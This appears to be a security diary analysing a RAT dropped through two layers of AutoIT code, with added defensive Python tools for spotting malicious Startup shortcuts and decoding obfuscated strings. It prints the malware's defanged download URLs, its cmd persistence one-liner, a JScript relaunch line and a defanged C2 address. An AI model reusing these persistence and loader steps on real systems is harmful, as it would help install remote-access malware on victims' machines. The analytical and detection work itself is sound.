RAT Dropped By Two Layers of AutoIT Code

    Published: 2025-05-19. Last Updated: 2025-05-19 05:37:10 UTC
    by Xavier Mertens (Version: 1)
    0 comment(s)

    Like .NET, AutoIT[1] has remained a popular language in the malware ecosystem for years. It is a simple language that can interact with all the components of the Windows operating system. I regularly discover AutoIT3 binaries (yes, it can be compiled). This weekend, I found a malware delivered through a double layer of AutoIT code!

    The initial file is an executable called "1. Project & Profit.exe" (SHA256:b5fbae9376db12a3fcbc99e83ccad97c87fb9e23370152d1452768a3676f5aeb). It is a compiled AutoIT script. Once decompiled, the code is simple and contains some interesting strings:

    Global $VY9A = "hxxps://xcvbsfq32e42313[.]xyz/OLpixJTrO"
    Global $ZX2B = "C:\Users\Public\Guard.exe"
    Global $FW3N = "C:\Users\Public\PublicProfile.ps1"
    $fU5L = ""hxxps://xcvbsfq32e42313[.]xyz/hYlXpuF.txt"""
    $oF6L = ""C:\Users\Public\Secure.au3

    Its behaviour is simple: it writes PublicProfile.ps1 to disk and executes it.

    Next, an AutoIT interpreter is downloaded (and saved as "C:\Users\Public\Guard.exe"), as well as another piece of AutoIT script (the second layer).

    Persistence is achieved via a simple .url file placed in the Startup directory:

    cmd /k echo [InternetShortcut] > "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
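    A .url shortcut is normally a web bookmark, but Windows will happily launch whatever local path is in its URL= line, which is what the cmd one-liner above abuses. The following script is an added example (my code, not the diary's or the malware's): it parses the [InternetShortcut] format and flags Startup-folder shortcuts whose target is a local script or executable rather than an http(s) address. SAMPLE_URL_FILE is constructed to match the SwiftWrite.url written by the dropper; the function names and the SUSPICIOUS_EXT list are my own choices.

```python
# Added example (not the diary's code): find Startup-folder .url shortcuts that
# point at a local script or executable instead of a web address, the
# persistence trick used by this sample. The .url content below is constructed
# to match what the dropper's cmd one-liner writes.
import os
import re
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

# Constructed sample: the SwiftWrite.url produced by the dropper's cmd line
# (cmd's echo keeps the quotes and adds a trailing space before the redirect).
SAMPLE_URL_FILE = (
    "[InternetShortcut] \n"
    'URL="C:\\Users\\admin\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.js" \n'
)

# A .url shortcut has no legitimate reason to launch any of these (my list).
SUSPICIOUS_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                  ".pif", ".exe", ".scr", ".com", ".bat", ".cmd", ".ps1", ".au3"}


def parse_url_shortcut(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None."""
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and line.lower().startswith("url="):
            return line[4:].strip().strip('"')
    return None


def is_local_script_launch(url: str) -> bool:
    """True when the target is a local (drive-letter or UNC) path ending in a
    scripting/executable extension. http(s) and other schemes return False."""
    target = url.strip().strip('"')
    # file:///C:/... is just another spelling of a local path.
    target = re.sub(r"^file:/{0,3}", "", target, flags=re.I)
    if re.match(r"^([a-z]:[\\/]|\\\\)", target, re.I) is None:
        return False
    # Normalise separators so splitext sees the real file name on any OS.
    ext = os.path.splitext(target.replace("\\", "/"))[1].lower()
    return ext in SUSPICIOUS_EXT


def scan_startup(startup_dir: Path) -> List[Tuple[Path, str]]:
    """Return (shortcut, target) pairs for every suspicious .url in a folder."""
    hits = []
    for shortcut in sorted(startup_dir.glob("*.url")):
        url = parse_url_shortcut(shortcut.read_text(errors="replace"))
        if url and is_local_script_launch(url):
            hits.append((shortcut, url))
    return hits


def demo() -> List[Tuple[Path, str]]:
    """Drop the constructed shortcut plus a benign one into a temp folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "SwiftWrite.url").write_text(SAMPLE_URL_FILE)
        (folder / "ISC.url").write_text("[InternetShortcut]\nURL=https://isc.sans.edu/\n")
        return scan_startup(folder)


if __name__ == "__main__":
    # On a live host, point scan_startup() at the real folders:
    # %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup and the
    # all-users equivalent under %ProgramData%.
    for shortcut, target in demo():
        print(f"{shortcut.name} -> {target}")
```

    Run it against both the per-user and the all-users Startup folders; a hit on a .pif, .js or .exe target is worth a look regardless of the file name, since the sample's names (SwiftWrite, WordGenius Technologies) are chosen to look like a legitimate product.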

    The JavaScript file relaunches the AutoIT interpreter (here named "SwiftWrite.pif") with the second script ("G"):

    new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\REM\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\REM\\AppData\\Local\\WordGenius Technologies\\G\"")

    Let's have a look at "G", the second layer of AutoIT code. This script is heavily obfuscated: every string is encoded and is only decoded at run time by the Wales() function. Example:

    If (Execute(Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0/2))) ...
    

    The Wales() function is simple; here is a Python version that helps decode all the strings:

    remnux@remnux:/MalwareZoo/20250518$ python3
    Python 3.8.10 (default, Jun 22 2022, 20:18:18) 
    [GCC 9.4.0] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> def Wales(encoded: str, key: int) -> str:
    ...     parts = [p for p in encoded.split("]") if p]
    ...     decoded = ''.join(chr(int(num) - key) for num in parts)
    ...     return decoded
    ... 
    >>> Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0)
    "ProcessExists('avastui.exe')"
    
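    Decoding one string at a time in the REPL gets old quickly on a script where every string goes through Wales(). The block below is an added example (my code, not the diary author's): it finds every Wales("<codes>", <key>) call in the script, evaluates the key expression without eval() (only an integer literal or one binary operation, enough for the 0/2 seen above), and rewrites each call as a plain AutoIT string literal so that "G" reads as ordinary code; decoded_strings() gives the same list for quick IoC triage. SAMPLE_AU3 is constructed around the one call quoted in the diary plus a second, invented call with a non-zero key to exercise the subtraction; the helper names are my own.

```python
# Added example (not the diary author's code): bulk-decode every
# Wales("<codes>", <key>) call in the second-layer AutoIT script and rewrite
# each as a plain string literal. SAMPLE_AU3 is constructed: the first call is
# the one quoted in the diary, the second is invented to exercise a key of 1.
import re
from typing import List

# Wales("80]114]...", 0/2): first argument is ]-separated decimal char codes,
# second argument is the key subtracted from each code.
WALES_CALL = re.compile(r'Wales\(\s*"([0-9\]]*)"\s*,\s*([^)]*)\)')
# Accept only an integer or one binary operation on integers as the key, so
# attacker-controlled text never reaches eval().
KEY_EXPR = re.compile(r'^\s*(\d+)(?:\s*([+\-*/])\s*(\d+))?\s*$')

SAMPLE_AU3 = (
    'If (Execute(Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]'
    '97]118]97]115]116]117]105]46]101]120]101]39]41",0/2))) Then\n'
    '    Exit\n'
    'EndIf\n'
    '$uRl = Wales("105]117]117]113]116]59]48]48", 2/2)\n'
)


def eval_key(expr: str) -> int:
    """Evaluate the key argument (e.g. '0/2' -> 0) without eval()."""
    m = KEY_EXPR.match(expr)
    if not m:
        raise ValueError(f"unsupported key expression: {expr!r}")
    a, op, b = m.groups()
    a = int(a)
    if op is None:
        return a
    b = int(b)
    if op == "+":
        return a + b
    if op == "-":
        return a - b
    if op == "*":
        return a * b
    # Division: the key must stay an integer for chr() to make sense.
    if b == 0 or a % b:
        raise ValueError(f"key is not an integer: {expr!r}")
    return a // b


def wales(encoded: str, key: int) -> str:
    """Python port of the script's Wales(): each char code minus the key."""
    return "".join(chr(int(n) - key) for n in encoded.split("]") if n)


def au3_literal(s: str) -> str:
    """Quote s as an AutoIT string; AutoIT escapes a double quote by doubling it."""
    return '"' + s.replace('"', '""') + '"'


def decoded_strings(script: str) -> List[str]:
    """Every decoded Wales() argument, in script order (quick IoC triage)."""
    return [wales(codes, eval_key(key)) for codes, key in WALES_CALL.findall(script)]


def deobfuscate(script: str) -> str:
    """Replace each Wales(...) call with the literal it evaluates to."""
    return WALES_CALL.sub(
        lambda m: au3_literal(wales(m.group(1), eval_key(m.group(2)))), script)


if __name__ == "__main__":
    # On the real sample: print(deobfuscate(open("G").read()))
    print(deobfuscate(SAMPLE_AU3))
```

    Calls whose first argument is a variable rather than a quoted literal are left untouched on purpose; those are the ones to inspect by hand, since they may chain another layer of decoding.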

    Finally, a "jsc.exe" process is spawned and the final malware is injected into it as a DLL: Urshqbgpm.dll

    I'm not sure about the final malware's family: it tried to connect to the C2 server 139[.]99[.]188[.]124 on port 56001, and this one is associated with AsyncRAT.

    But, in the DLL, we can find a lot of references to PureHVNC[2]:

    [1] https://www.autoitscript.com/site/
    [2] https://cyble.com/blog/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/

    Xavier Mertens (@xme)
    Xameco
    Senior ISC Handler - Freelance Cyber Security Consultant
    PGP Key
